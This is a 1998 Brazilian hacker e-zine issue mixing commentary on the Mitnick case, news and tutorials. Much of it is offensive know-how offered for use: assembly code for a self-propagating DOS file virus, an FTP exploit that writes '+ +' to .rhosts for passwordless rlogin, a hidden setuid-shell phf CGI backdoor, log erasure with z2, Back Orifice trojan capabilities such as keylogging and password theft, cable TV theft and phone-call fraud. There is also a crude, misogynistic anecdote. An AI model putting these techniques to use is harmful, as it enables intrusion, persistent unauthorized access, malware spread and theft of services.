Cszine 23
zZZZZZZZZZZZZZZZZZZz
zZ
zZ
cCCCCc sSSSSs zZ ii n NN eEEEe
cCC CCc sSS SSs zZ II Nn NN eEE EEe
cCC CC sSS SS zZ NNn NN eEE EE
cCCC CC SSSs S zZ ii NNNn NN eEEE E
CCCC C SSSs zZ II NNNNn NN EEEE
CCCC SSSs zZ II NN NNn NN EEEEEEEe
CCCC SSSs zZ II NN NNn NN EEEEEEEe
CCCC c SSSs zZ II NN NNn NN EEEE
CCCC cC s SSSs zZ II NN NNnNN EEEE e
CCC CC Ss sSS zZ II NN NNNN EEe eE
CCc cCC SSs sSS zZ II NN NNN EEe eEE
CCCCCC SSSSSS zZ II NN NN EEEEE
zZ
zZ
zZZZZZZZZZZZZZZZZZZz
Numbah 23
~~~~~~ ~~
¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯
* E-Mail da revista : cszine@hotmail.com
* Memoserv de Struck : /msg memoserv send Struck <msg>
(Soh no irc.via-rs.com.br)
* Page da revista : http://members.xoom.com/cszine
Introduction
Bem.. Quando voce acha que nao tem o que botar aqui vai aparecendo as coisas com o tempo. Primeiro gostaria de explicar que Bernie S. nao e' o autor da mateira "TO MITNICK OR NOT MITNICK". Acontece que eu quando publique as 2 primeiras partes soh tinha dado uma lida rapida sem prestar atencao nos nomes.
Nao conhecia a historia de Bernie S. que e' explicada aqui. Quando busquei pelo autor desse texto(estava no barata eletrica), soh encontrei 2 nomes citados no fim do txt. Kevin Mitnick e Bernie S.
O mitnick nao podia ter escrito esse texto entao deduzi que foi a 2a opcao. Agora, antes de publicar a ultima parte do texto descobri que Bernie S e' mais um hacker que foi preso injustamente, sendo assim tambem nao foi ele que escreveu isso.
Entao como nao sei o autor, coloquei o autor da origem desse texto.
Outra coisa.. Na RWX06 apareceu a minha zine na secao de links e meu email nos emails. Gostaria de pergntar ao kbyte porque no pacote da 06 zipado nao descompactam nenhum arquivo nos diretorios criados???
Caso voce descompacte no windows esses diretorios nao apareceram pois o windows nao reconhece arquivos sem conteudo.
Soh isso.. Valew ae kbyte.
Indice
Secao: Assunto: Autor:
1. Kevin Mitnick TO MITNICK OR NOT MITNICK? Derneval
2. Esclarecimento I'm not Nerd!! Cheat Struck
3. Programacao Alterando menus do Windows Cheat Struck
4. VIRII Programando um virus (parte2) Simon Phoenix
5. NeW's Truques e Noticias Cheat Struck
6. Phreaking Criando a Grandiosa Box Cheat Struck
7. Bugz Bugzinhos Espertos Cheat Struck
8. Invasao de Privacidade Back Orifice spectro
9. Hack, the Art Truques Experts Cheat Struck
10. Emails Emails.. Cheat Struck
1. Kevin Mitnick
TO MITNICK OR NOT MITNICK (por Derneval) -ultima parte-
Grandes corporacoes, como a IBM, nunca pensaram no individuo, ate' o aparecimento de computadores pessoais, como o Altair, feito por fucadores de micro (hackers - do meu ponto de vista) como Steven Jobs, Bill Gates, Osborne, etc.. claro que alguns ficaram ricos no processo de explorar este mercado. Nao tinham concorrencia de qualquer especie das grandes corporacoes. Um computador antigo custava centenas de milhares de dolares, ou mesmo milhoes e precisava de salas e um gasto de energia enorme.Podia se cobrar caro e ganhar muito dinheiro com um destes. So' grandes empresas podiam pagar. A Internet comecou e teve sucesso exatamente porque nao dependia de grandes corporacoes. Grandes empresas tem estrategias de mercado, baseadas em analises de custo, que tem em vista a obtencao de um lucro que e' conseguido do consumidor final do produto. A Internet foi feita por individuos que estavam simplesmente se divertindo ajudando individuos iguais a eles.
Uma grande empresa controla um mercado. Atraves da propaganda veiculada na TV, no radio ou atraves do controle da distribuicao (voce produz, precisa entregar). A TV, o radio e os jornais tem cabecas e registro. Podem ser controladas. O individuo que usa o computador pode ser tao ou mais eficaz quanto qualquer parte do sistema e superar qualquer fronteira fisica ou monetaria que o sistema poe contra ele. Por isso e' que Mitnick esta' sendo duramente julgado. Nao pelo que fez, mas como disse sua avo', "pelo que eles estavam com medo de que ele pudesse fazer". Talvez seja apenas um aviso para a grande massa nao tentar fazer "subversao eletronica".
Eu tenho um medo sincero de viajar para os EUA. Como brasileiro, nao posso ser extraditado, mas .. e se acharem que minha prisao pode servir de exemplo? Serio, ate' eu fico paranoico.
Para finalizar, existe o caso de "Bernie S.", preso porque tinha em sua posse um computador com capacidade de reprogramar um telefone celular e um "discador" Radio Shack modificado. Como o Servico Secreto americano (que esta' tentando de qualquer jeito ter sucesso na area) entrou em campo, foi desencavada uma antiga contravencao feita pelo cara. Do tipo que so' da' uma multa. Como a sentenca (anterior) nao era seria, essa condenacao (a anterior) colocava o cara em prisao condicional, ou seja, ele estava livre, mas seria preso se fizesse algo grave. O juiz, de cidade de interior, talvez influenciado pelo Servico Secreto, so' para resumir a historia, ao inves de suspender a sentenca ou relaxar a prisao (mesmo aqui no Brasil, a nao ser que o promotor tenha razoes serias para isso, o normal e' relaxar a prisao, ou seja , o cara espera a pena em liberdade), o juiz deixou o cara na cadeia e com fianca de US$ 250.000. Um assassino, condenado pelo mesmo juiz, teve fianca de US$ 50.000.
A historia continua e o sujeito esta' fazendo companhia a pessoas na fila da pena capital (pena de morte), assassinos e estupradores. Ah sim. Um dos argumentos usados para manter o cara no xilindro' foi o lance de que ele tinha uma copia do "Anarchist's Cookbook", um livrinho que nos EUA, pode-se encontrar em qualquer grande livraria. Alias, na Inglaterra tambem. O cara que fuzilou sei la' quantas criancas numa cidadezinha inglesa NAO NAO NAO tinha um desses.
Diz a revista "2600 - Hacker Quaterly" que se o cara realmente for condenado, abre um precedente para se por qualquer um na cadeia por coisa bem a toa. Pode-se ler mais sobre Eddie Cummings ou Bernie S. no http://www.2600.com/law. O caso Mitnick tambem esta' la' com updates. Se voce quiser dar uma forca tanto para o Mitnick quanto para o Eddie, os enderecos sao:
* Bernie S.
bernies@2600.com - A revista 2600 re-envia para ele.
* Kevin Mitnick
kmitnick@2600.com - idem
..ou, via correio comum (lembrar que toda a correspondencia e' examinada):
Kevin Mitnick 89950-012
P.O. Box 1500
Unit 7
South Los Angeles, CA 90053-1500
2. Esclarecimento
I'm not nerd!!
Soh encaixei isso aqui para esclarecer como eu consigo escrever tanto em tao pouco tempo.
Decidi botar isso por causa do que os outros estao achando ae..
"Links: http://members.xoom.com/cszine - Um bom zine ai, e' incrivel como o cara consegue escrever tanto em tao pouco tempo. Tem mais de 20 edicoes do zine em um tempo bem curto. Sera que ele faz alguma outra coisa da vida? :)"
Isso saiu na RWX. Vamos ver o que eu faço da vida.
Primeiro vamos resumir o que eu fiz sexta (2/9).
Um resumo mais simples e': Levei um fora de uma garota e entrei na internet. Assim parece ateh que eu sou um nerd naum???
Entao vamos detalhar essa historia..
8:20 - Cheguei no colegio(faltei o 1o perido) na aula de educacao fisica. Saiu uma apeladinha e joguei na saga(apelido : Gamara). Meti 3 bucha.
12:00 - Sai do colegio e fui almosar na casa de um amigo.
13:30 - Fui na casa da garota(burguesia fede!!) com o meu amigo.
14:00 - Meu amigo ja' tava quase comendo a sua namorada entao eu tive que atakar pra nao ficar de fora.
23:00 - Ja' tinha lambido ela inteirinha.. So que a vadia nao deixava eu tirar o sutia (DELA!!!).
1:00 - As gurias(nos tava na casa do meu amigo) foram pra casinha. O meu amigo veio e dize que ela falow: "Poderia ter sido bom, se ele nao tentase fazer o que ele tentou."
1:01 - Me indignei. Se nao fizesse isso eu seria bicha.
1:10 - Decidimos beber cachassa.
1:30 - Entrei na internet...
Fim da historia.
Isso parece ser uma vida de nerd??? Eu acho que nao. Se voce acha que e' entao va se foder e cuidar da sua vida que eu nao tenho que dar satisfacao a ninguem.
Eu nao tenho nada contra os nerds, jah devo ter conversado com muitos delse na inet, mas pra mim esses kras nao aproveitam muito a vida. Vao arranjar uma mulher porra!
hm.. Ja' vou aproveitar aqui pra colocar as correcoes feitas na page.
- O manual Phreaking jah pode ser Downloado. Ele tah bem incompleto, talvez arrumeo daqui uns dias.
- O motobible.zip(a biblia motorola) tava com uns defeito e nao podia ser aberta. O problema jah tah arrumado.
Obrigado ao [LuCiFeR] pelos toques.
3. Programacao
Alterando menus no Windows
O VB possui umas caracteristicas que muitas vezes nao sao adequadamente exploradas. Aqui mostrarei como fazer um programa que seta qual quer arquivo .bmp Como papel de parede sem precisar abrir o Bitmap ou PaintBrush.
Abra o Visual Basic (4 ao 6).
Ao iniciar, remova o form1 que e' criado por default.
Insira um novo modulo (BAS).
Coloque o seguinte conteudo:
--------------------------------Corte Aki------------------------------------
Option Explicit
Rem Atencao as 3 linhas a seguir deverao ser digitadas em 1 só (sem qubra).
Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInf
oA" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByV
al fuWinIni As Long) As Long
Sub Main()
Dim 1_Ret As Long
1_Ret = SystemParametersInfo(20, 0, Command$, 0)
End Sub
-----------------------------------------------------------------------------
Salve como C:\Windows\SWP.EXE
Okz o programa tah feito. Soh falta coloca-lo no menu Arquivo (Que e' aberto quando clica o botao direito do Mouse no cursor). Para isso crie o seguinte registro:
----------------------------Corte Aki--(SWP.REG)-----------------------------
REGEDIT 4
[HKEY_CLASSES_ROOT\Paint.Picture\shell\Usar_como_Papel_de_Parede]
"EditFlags"=hex:01,00,00,00
@="Usar como Papel de Parede"
[HKEY_CLASSES_ROOT\Paint.Picture\shell\Usar_como_Papel_de_Parede\command]
@="C:\\WINDOWS\\SWP.EXE %1"
-----------------------------------------------------------------------------
Salve e execute esse registro.
Agora clique o botao direito do mouse num arquivo .BMP e veja o resultado.
Notaram que recentemente estou passando apenas programas para Win/DOS ?? Isso devido as criticas de uns que ainda nao conseguiram instalar o Linux e nao poderiam usar os programas.
4. VIRII
Progamando um virus (por Simon Phoenix)
Na ultima edicao nos acabamos quando o arquivo que sera' infectado foi guardado em 1885:0114 (DS:0114) e foi colocado em BX para ser chamado. Se voce jah se esqueceu do que vimos, entre no DOS e execute os passos da edicao passada novamente. Soh assim voce vai pegar a manha.
Atencao o DS (1885) foi apenas um exemplo. Ele varia.
Vamos ver o resto do codigo:
1885:014B PUSH ES ;Essas duas instrucoes colocam ES=DS
1885:014C POP DS
1885:014D MOV DX,034F ;Isso coloca o codigo do programa in-
1885:0150 MOV CX,FFFF fectado no final do virus.
1885:0153 MOV AH,3F
1885:0155 INT 21
Agora, o AX e' igual ao tamanho do programa. Entao somamos ao tamanho do virus:
1885:0157 ADD AX,034F
1885:015A CS:
1885:015B MOV [0112],AX ;Armazena o tamanho total em CS:0112
As instrucoes a seguir servem para nao fazer com que um virus infecte duas vezes o mesmo programa:
1885:015E DS:
1885:015F CMP WORD PTR [0352],5649
1885:0165 JZ 0188
Agora faramos que o ponto de leitura/escrita do arquivo, aponte o primcipio dele, jah que reescrevemos todo o programa. Lembrese que em DS:0114 temos o arquivo infectado guardado.
1885:0167 XOR CX,CX
1885:0169 MOV DX,CX
1885:016B CS:
1885:016C MOV BX,[0114]
1885:0170 MOV AX,4200
1885:0173 INT 21
1885:0175 JB 0188
Aqui esta a verdade da infeccao. As proximas instrucoes, reescrevem o programa com o novo tamanho e o fecham.
1885:0177 MOV DX,0000
1885:017A CS:
1885:017B MOV CX,[0112]
1885:017F CS:
1885:0180 MOV BX,[0114]
1885:0184 MOV AH,40
1885:0186 INT 21
1885:0188 CS:
1885:0189 MOV BX,[0114]
1885:018D MOV AH,3E
1885:018F INT 21
Agora que ja temos o programa infectado, passemos para o seguinte..
Agora restauramos o valor de DS para CS, para que continue a buscar arquivos. Se encontrar outro, vai para 013E e continua a infeccao. Se nao encontrar continua pelo 019E.
1885:0191 PUSH CS
1885:0192 POP DS
1885:0193 MOV AH,4F
1885:0195 MOV DX,025F
1885:0198 INT 21
1885:019A JB 019E
1885:019C JMP 013E
Se nao encontrou mais nada, estabelece a direcao do DTA (Isto é importante heim).
1885:019E MOV DX,0080
1885:01A1 MOV AH,1A
1885:01A3 INT 21
Lembra que eu disse que explicaria a instrucao na 1885:011D que tinha a funcao de recordar o local onde estavamos (1885:0105). Pois e', ele e' um contador que indica quantas vezes o virus infectou.
Estes comandos comparam esse contador a 5. Se for menor que 5, nao faz nada. Se for maior ou igual, ele olha a direcao 0040:006C (contador de clicks do sistema) se o conteudo dele for 1, imprime uma msg e sai pro DOS.
1885:01A5 CMP BYTE PTR [0105],05
1885:01AA JB 0207
1885:01AC MOV AX,0040
1885:01AF MOV DS,AX
1885:01B2 MOV AX,[006C]
1885:01B5 PUSH CS
1885:01B6 POP DS
1885:01B7 AND AX,0001
1885:01B9 JZ 0207
1885:01BA MOV DX,01C4
1885:01BD MOV AH,09
1885:01BE INT 21
1885:01C1 INT 20
Agora o virus prepara a memoria para executar o programa que foi infectado. Para isso ele copia um mini-programa de 43 bytes (2B) que começa em CS:0224.
1885:0207 MOV SI,0224
1885:020A MOV CX,002B
1885:020D XOR DI,DI
1885:020F REPZ
1885:0210 MOVSB
1885:0211 XOR DI,DI
1885:0213 CS:
1885:0214 MOV WORD PTR [010E],0000
1885:021A CS:
1885:021B MOV [0110],ES
1885:021F CS:
1885:0220 JMP FAR [010E]
A seguir esta o mini-programa que passa a executar. Ele iguala os registros de dados e extra com os do virus.
2385:0000 PUSH DS
2385:0001 POP ES
2385:0002 MOV SI,044F
2385:0005 CMP BYTE PTR [0105],01
2385:000A JNZ 0234
2385:000C SUB SI,0200
2385:0010 MOV DI,0100
2385:0013 MOV CX,FFFF
2385:0016 SUB CX,SI
2385:0018 REPZ
2385:0019 MOVSB
2385:001A CS:
2385:001B MOV WORD PTR [0100],0100
2385:0021 CS:
2385:0022 MOV [0102],DS
2385:0026 CS:
2385:0027 JMP FAR [0100]
E e' isso galera.
E' muito foda explicar um virus e sua programacao. Note que esse virus e' bem simples, caso contrario eu nao saberia explica-lo.
Aos poucos eu vou aprimorando essa secao para virus mais complexos.
5. NeW's
Truques e noticias
Eu tenho umas noticias que queria divulgar a tempo, mas ae chegou o Simon Phoenix com as materias e tirou o espaço.
Para nao ficar desatualizadas eu decidi encaixa-las aqui.
Virus para PlayStation
Isso mesmo.
Jah foram descobertos diversos virus para playstation nos EUA.
Os virus foram encontrados em jogos como Vigilante8, CoolBoardes e Mortal Kombat 4. Todos jogos piratas, comprados em camelôs.
Os virus funcionavam deletando todos os jogos gravados no Memory Card (inclusive do proprio jogo) e regravavam com besteiras de nomes como "fuck", "fuck off", "My love for Anna", etc...
Esses virus nao poderiam ser apagados pois estam em CDs.
Na teoria os autores, copiaram o CD com um coputador e um gravador de CDs. Porém acresentaram uma funcao no jogo que chamava um novo programa.
Por lah ja' correm boatos de que um virus infectaria um espaço na memoria do Memory Card, convencendo o jogador que faz parte do jogo salvo.
Nao e' possivel que esses virus façam muitas coisas porem...
A Sony jah estah desenvolvendo um Anti-Virus que deve ser rodado no Computador com o CD de playstation no drive.
Se o virus for detectado nao restara escolha a nao ser comprar um novo CD que nao esteja carregando o virus.
O diretor da Sony defende a segurança do videogame dizendo: "Isso soh acontece com quem compra CDs piratas. Os CDs originais da propria produtora estao 100% livres de qquer ameaça ao jogador".
Essas informacoes foram conseguidas por WarNabe. Um amigo meu que mora lah nos EUA e esta por dentro dos assuntos.
BitchX para Windows
Eu to achando que e' soh balela..Mas em todo o caso:
Correm boatos por ae de que estao lançando o BitchX para o Windows.
Agora me diz uma coisa, voce que jah usou o BitchX e o mIRC. Por que alguem iria querer concorrer com o mIRC(que é o melhor programa de IRC ateh agora inventado)???
Seria mais provavel que o mIRC fosse lançado para Linux, para tirar o BitchX do pedaço. E tiraria mesmo, pois todo mundo que tem linux iria querer trocar seu BitchX por um mIRC.
Se o BitchX fosse lançado para o Windows, estaria comecando uma gerra com o mIRC(assim como a netscape e o explorer) na qual iria acabar perdendo.
TV a cabo de graça
Esse é outro meio de roubar tv a cabo.
Tendo apenas uma assinatura e um aparelho decodificador do sinal jah e' possivel voce reproduzir o mesmo canal para varias televisoes na sua casa.
Mas dah apenas para ver um canal em ambas as televisoes.
Faça segundo o desenho:
Derivador .---------.
.-------. | |
cabo da | out|=========| TV1 |
net .-------------. | | | |
=========|Decodificador|=|in out| '---------
'-------------' | | .---------.
| out|=========| |
'-------' | TV2 |
| |
'---------'
Voce pode fazer isso com ate 3 televisoes diferentes, e se tiver um outro derivador com 5. Assim:
___
|TV1|
_ __ /|___|
| | | =-' ___
-------| |=| =---|TV2|
|_| |__=-. |___| ___
\ |TV3|
| __ /|___|
| | =-' ___
'=| =---|TV4|
|__=-. |___|
\___
|TV5|
|___|
E a cada mais derivadores, mais televisoes poderam ter acesso a TV a cabo. Assim voce pode criar ateh um canal pirata para passar para todos os carinhas.
Para isso e' soh no lugar do decodificador(onde sai o primeiro derivador) colocar um video Kacete com a fita que vc gravou rodando.
Isso seria legal fazer num edificio. Existem também outros meios de fazer um canal pirata para ser destribuido em um predio...Mas isso, é outra historia...
6. Phreaking
Criando a "grandiosa" Box
Voce deve se lembrar da materia "obtendo frequencias" saida na cszine 21. Pois eh eu pedi muito que me mandassem emails, porém recebi poucos. Quero fazer um apelo pedindo a voce que esta lendo essa materia, converse com todos seus amigos para que leiam a materia publicada na edicao 21.
Porfavor kra. Talvéz tu nao saiba muita coisa sobre isso, mas quem sabe se o amigo do teu amigo saiba??
Se voce tiver em maos, manuais de telefones sem fio (qquer modelo) por favor enviem-os para o meu email.
Eu prometo a vcs que se descobri eu publicarei todo o desenvolvimento da Box aqui, e isso com certeza revolucionara' o phreaking e o boxing no Brasil. Assim nao seremos mais conhecidos lah fora por aqueles que soh querem ligar degraça e sim como verdadeiros Phreakers.
Mas primeiro, gostaria que voce colocasse na caixola que nao e' phearking, prheaking, phrekeing ou phreacking e sim phreaking.
-=-=-=-=-=-=-=-=-
From : Ghost (Anonymous email)
Subject : Phreaking
> So quero te ajudar naquela box cara. Eu nao sei se a minha teoria ta certa,
>mas qualquer ajuda chega bem né?
> Então aqui esta a teoria:
>
>1. Colocar um transmissor em frequencia fixa para a faixa FM no aparelho.
>2. Congregar o aparelho de telefone sem fio em um radio que receba faixas FM
>,fazendo que este receba os sinais transmitidos pelo transmissor.
>
> Assim conseguiriamos um grampeamento da linha igual a feita pela policia
>nas tocaias.
> Eu sei que isso nao e' muito mas a minha intencao foi ajudar.
-=-=-=-=-=-=-=-=-=-
From : XXXXXXXXXXX
Subject : .
>Dae Cheat Struck.
>
>Depois de ler a edicao 21 da csz, decifdi te ajudar na materia de
>frequencias.
>Bem eu nao sei como obter frequencias diretamente, mas sei que é possivel
>utilizar a linha de um outro telefone celular apenas obtendo um conjunto de
>numeros chamados ESN/MIN.
>Assim voce mudará a identidade do celular, o que é chamado de clonagem pelos
>phreakers.
>Existe uma materia muito boa que fala sobre isso na Axur numero 3.
>Pode publicar todas as informacoes na e-zine, mas nao publique o meu email
>okay?
-=-=-=-=-=-=-=-=-=-
Soh pra deixar claro, nao e' aprender a clonar celulares que eu estou interesado. Mas de qualquer maneira valeu a intencaum.
-=-=-=-=-=-=-=-=-=-
From : XXXXXXXX
Subject : cszine|phreaking
> Ola
> Primeiro quero deixar claro que nao sou nem hacker nem phreaker. Sou apenas
>um enteressado nos assuntos eletronicos.
> Depois de ler a zine 21, decidi escrever apenas para dizer o que eu acho
>que pode dar certo para obter frequencias.
> Ao inves de tentar utilizar um radio para receber as frequencias (este nao
>enviaria frequencias para usar a linha e sim receberia), voce pode tentar
>usar um telefone celular, afinal este é um aparelho trasmisor e receptor de
>frequencias.
> … só isso cara, espero que tenha lhe clareado mais as ideias.
Ae essa foi interesante e clareou mesmo. Me liguei que o radio apenas recebe ondas e nao envia. Sendo assim nao funcionaria a box a nao ser para um grampeamento como disse o Ghost no primeiro email.
Continuem mandando mails que estao ajudando(quase que desmonto o meu som).
Ligacao acobrar mais barato
Nao sei ao certo se funciona em orelhoes. Em celulares funciona mas em orelhoes acho meio brabo. Em todo caso vou deixar registrado aqui.
Isto nao foi inventado por mim e quero deixar claro que encontrei numa pagina onde a secao hackz era: Invasao por IP, Invasao por FTP e Como roubar senhas(soh essas 3).
O esquema eh quase o mesmo daquele em celulares, porem fica mais dificio de te descobrirem, pois pensaram que e' o kra para quem vc estah ligando que esta phreakeando a ligaçao.
Vamos pegar um exemplo de telefone.
9 011 5953353
| | |
| | +---Numero do telefone
| +---DDD
+---A cobrar
Entao pegamos o ultimo numero e subtraimos de 10.
10 - 3 = 7.
Disque para este numero:
9 011 5953353 7
Talvez funcione nos orelhoes da TELESP, pois na CRT nao funcionam.
7. Bugz
Bug na permisao de diretorios ftp
Esse bug foi descrito na rootshell.
Tipo.. veja os logs de uma conexão normal que podera' ser explorada.
# ftp host.com.br
Connected to 666.666.666.666.
220 target FTP server (Version wu-1.2(1) Mon Feb 30 18:04:42 EST 1995) ready.
Name (666.666.666.666:hakd00d): ftp
331 Guest login ok, send your complete e-mail address as password.
Password:
230-
230-Welcome to Victim Internet Services, Inc.
230-
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 7704
drwxrwxrwx 40 ftp other 8192 Jun 10 19:11 .
drwxr-xr-x 40 root other 8192 Jun 10 19:11 ..
lrwxrwxrwx 1 ftp other 8 May 24 12:19 1869 -> pub/1869
drwxrwxrwx 4 root root 4096 May 23 02:05 pix.tar.gz
lrwxrwxrwx 1 ftp other 8 May 24 12:19 idiot -> pub/idiot
Notaram alguma falha????
O dirtorio atual esta com permisao rwx (leitura-escrita-execucao) para todos os usuarios. Sendo assim qquer um pode criar um arquivo ou diretorio aqui.
O truque agora e' colocar um .rhosts para permitir a conexão rlogin sem precisar da senha. Para isso digite:
echo "+ +" > .rhosts
Se o comando echo nao estiver disponibilitado, envie um arquivo com esse conteudo (+ +) e nomeieo para .rhosts .
Agora disconectesse e use a famosa conexão via rlogin:
rlogin -l username host.com.br
Onde o username devera' ser ftp.
Tirando o root do root
Ja' saiu uma materia parecida nao me lembro em qual edicao. Soh que aqui os esquemas sao diferentes.
A maioria dos roots de varios sistemas entram com uma conta pessoal e depois, quando querem acessar um programa que nao tem acesso ou acresentar contas, usam o comando su para tornarem root.
O comando su deve ser usado assim:
$ su root
Passwd:
#
Voce jah pensou em ver a fonte desse comando??? Ela nao tem nada de mais. E' uma shell normal, camuflada por um pedido de login.
Entao como o usuario vira root com ele?? Do mesmo modo em que qquer usuario pode virar root com uma shell normal. Esse comando esta com a opcao +s ligada. Para verificar digite:
ls -la /bin/su
-rwsrwxrwx 1 root root 8192 Jun 10 19:11 su
Se ligou agora??? Retire o +s desse comando que ele nao funcionara' mais. A nao ser que o root esteja consiente dos atributos desse comando.
Em outras palavras..
..Voce tem que fazer isso para cancelar esse comando:
chmod -s /bin/su
..E o root tem que fazer isso para recupera-lo:
chmod +s /bin/su
chown root /bin/su
8. Invasao de privacidade
Back Orifice (por spectro e Cheat Struck)
Bem eu havia prometido e vou ter que compri. Com a ajuda do spectro eu decidi escrever um pouco mais sobre o BO.
Preste atencao.. Eu que to escrevendo tudo, mas a maioria das informacoes forama conseguidas pelo spectro okz?? Ele pediu pra deixar claro o seguinte:
"Nao gosto muito desses progz. Achu uma aittude lame trovar o kara ateh ele instalar o server pra fuder o kara todo. O q eu achu legal seria aprender "COMO AS COISAS FUNCIONAM" e tbm usar esse tipo de prog somente pra fazer brincaderas, mas cada um cada um..."
Agora vamos ao que interessa.
O patch mostrado na CSzine 21 pode ser facilmente alteravel pelo kra que possuir o BOconfig. O BOCONFG.EXE pode configurar todas as funcoes do servidor BO.
Execute : BOCONFIG BOSERVER.EXE . Ou coloque o nome do servidor do BO.EXE . Ae voce configura tudo do servidor.
O BODetect pode ser encontrado na pagina da revista. Ele detectara qquer presença do BO no seu Windows.
Outro meio de evitar o BO e' instalar um firewall como o Conseal. O BOclient envia pacotes UDP nao camuflados para o BOserver. Esses pacotes podem ser bloqueados pelo firewall.
Uma trojam semelhante ao BO e' o NetBusmas este tem mais de 500Kb e seu icone original e' uma tocha.
O NetBus tem funcoes bem mais interessantes que o Back Orifice com o programa cliente vc pode desinstalar o server mas eh bem mais divertido. Naum tem tantas funcoes quanto o BO mas entre elas sao:
- Mostrar uma imagem na tela do server.
- Dar um printscreen na tela do server e mandar para vc.
- msgsystem bem mais completo com vários tipos de janelinha (tipo OK, retry e cancel) e ainda te avisa qual botao o kara apertou.
- E vc tbm pode abrir e fechar o drive de cd do kara.
Talvez o [LuCiFeR], ex SoulSpy, escreva algo sobre ele para as pro'ximas edicoes.
Algumas das principais funcoes do BO sao:
- Reebotar o sistema
- Capturar passwds logados
- Logar todas as teclas pressionadas
- Travar o sistema
- Mandar caixas de msg(estas bem simples) pro host
- Lista e killar Processos. Tipo mIRC. hehehe
- Abilitar/Desabilitar HTTP para mapear a unidade
- Alem do completo manuseio de arquivos.
Use o BOGUI.EXE como cliente, pois esse tem um manuseio bem mais facil e agil que o BOCLIENT.EXE .
A RWX portou o BO para Linux. Ainda nao dei uma olhada nele, mas como tudo da rwx, deve tar canal.
Bem.. Vou parar por aqui. A 1a parte dessa materia saiu na CSZ21.
Esta materia teve uma participacao especial de...
spectro: spectro@deathsdoor.com
http://www.fortunecity.com/skyscraper/nuclear/788
9. Hack, the Art
Mais Backdoor
Backdoors em sistemas UNIX esta virando uma de minhas principais qualidades. Aqui vou descrever mais uma descoberta nao tao recentemente, mas que percebi que nao havia saido ainda na zine.
PHF BACKDOOR
Antes que voce venha me dizer: "tah que e' isso?? Tu vai ensinar de novo os bug de phf???", leia atentamente esse texto que ele ensinara como fazer um phf num dir qquer para que esse possa ser executado.
Siga os passos:
1. Escolha um diretorio que possa ser acessado pelo Browser. Tipo "/usr/www/cgi-bin" , Soh que menos obvio.
2. Faça uma backdoor de shell.
cp /bin/sh /bin/.bash
chmod 7555 /bin/.bash
3. Crie um script no diretorio escolhido no passo 1 com o seguinte conteudo:
/bin/.bash
$1 $2 $3 $4 $5 $6
4. Salve e disconectesse.
5. Abra o browser e digite no url:
http://www.host.com.br/cgi-bin/phf%20cmd%20cmd%20cmd%20cmd
| | | | | | |
| | | | | | +---Comando 4..
| | | | | +---Comando 3..
| | | | +---Comando 2..
| | | +---Comando a ser executado
| | +---Nome do script criado no passo 3
| +---Diretorio escolhido no passo 1
+---Endereço do host
Sniffers
Aqui vai um exelente catador de sniffers.
O que ele faz e' procurar por qquer sniffer que esteja atualmente rodando no sistema. Pode servir tanto para o ataque quanto para seguranca.
Compile com: cc -o promisc promisc.c
----------------------------Corte Aki--(promisc.c)---------------------------
#include <stdio.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <errno.h>
#if defined (__linux__)
#include <linux/if.h>
#else
#include <net/if.h>
#endif
#define size(p) (sizeof(p))
int dev_flags=0,
device_flags=0,
set_look_all=0;
int
main(int argc, char **argv) {
struct ifreq ifreq, *ifr;
struct ifconf ifc;
char buf[BUFSIZ], *cp, *cplim;
if(argc <= 1)
set_look_all++;
if((dev_flags = socket(PF_INET, SOCK_DGRAM, 0)) < 0) {
fprintf(stderr, "An error occured establiashing while establishing a
socket\n");
perror("socket");
exit(1);
}
ifc.ifc_len = sizeof(buf);
ifc.ifc_buf = buf;
if(ioctl(dev_flags, SIOCGIFCONF, (char *)&ifc) < 0) {
perror("SIOCGIFCONF");
exit(1);
}
ifr = ifc.ifc_req;
cplim=buf+ifc.ifc_len;
for(cp = buf; cp < cplim;
cp += sizeof (ifr->ifr_name) + size(ifr->ifr_addr))
{
ifr = (struct ifreq *)cp;
if(argv[1])
if(strcmp(ifr->ifr_name, argv[1]) && !set_look_all)
continue;
ifreq = *ifr;
if(ioctl(dev_flags, SIOCGIFFLAGS, (char *)&ifreq) < 0)
{
fprintf(stderr, "SIOCGIFFLAGS: %s (get interface
flags): %s\n", ifr->ifr_name,strerror(errno));
continue;
}
device_flags=0; device_flags = ifreq.ifr_flags;
fprintf(stdout, "%s: ", ifreq.ifr_name);
if((device_flags & IFF_PROMISC) != 0)
fprintf(stdout, "Promiscuous: Sniffer detected.\n");
else
fprintf(stdout, "Not-Promiscous: No Sniffers detected
.\n");
if(!set_look_all)
exit(0);
else
continue;
}
if(!set_look_all)
fprintf(stdout, "%s: Unknown device.\n", argv[1]);
}
-----------------------------------------------------------------------------
Apagando logs
O programa z era um otimo apagador de logs. Entao decidiram fazer a segunda versao dele, o z2, e ficou ainda melhor.
Nao vou passar a fonte dele aqui porque ele esta na secao de progs para unix na pagina da zine.
Voce deve usalo emquanto e' root, assim:
# z2 root
Isso apagara' qquer log utmp, wtmp e lastlog do usuario root. Porem ja' existem programas que detectam quais logs foram apagados.
Voce pode encontrar programas assim em zines especializadas em segurança em linux, assim como a rwx(http://rwx.ml.org).
Esse eh um dos melhores programas apagadores de logz que podem ser encontrados atualmente.
10. Emails
Emails..
ATENCAO!!!! Eu nao estou conseguindo responder a todos os emails, por isso estou abrindo essa secao permanente. Todos os emails que eu receber apareceram aqui. Nao vou publicar quem escreveu, pelo simples motivo de acreditar em privacidade.
Assim que voce encontrar seu email aqui, a resposta estara abaixo. Novamente peço desculpas.
From: "XXXXXX" <XXXXX@XXXXXXX.com>
Subject: ae struck
Date: Thu, 1 Oct 1998 16:09:03 -0300
> Tipo, tu naum foi no va-rs no sabado neh? Fiquei lah um tempao brou...
> Seguinte dah umas conferida nas info q eu te mando soh pra garantir...
>(qualquer ser humano estah a merce dos erros...)
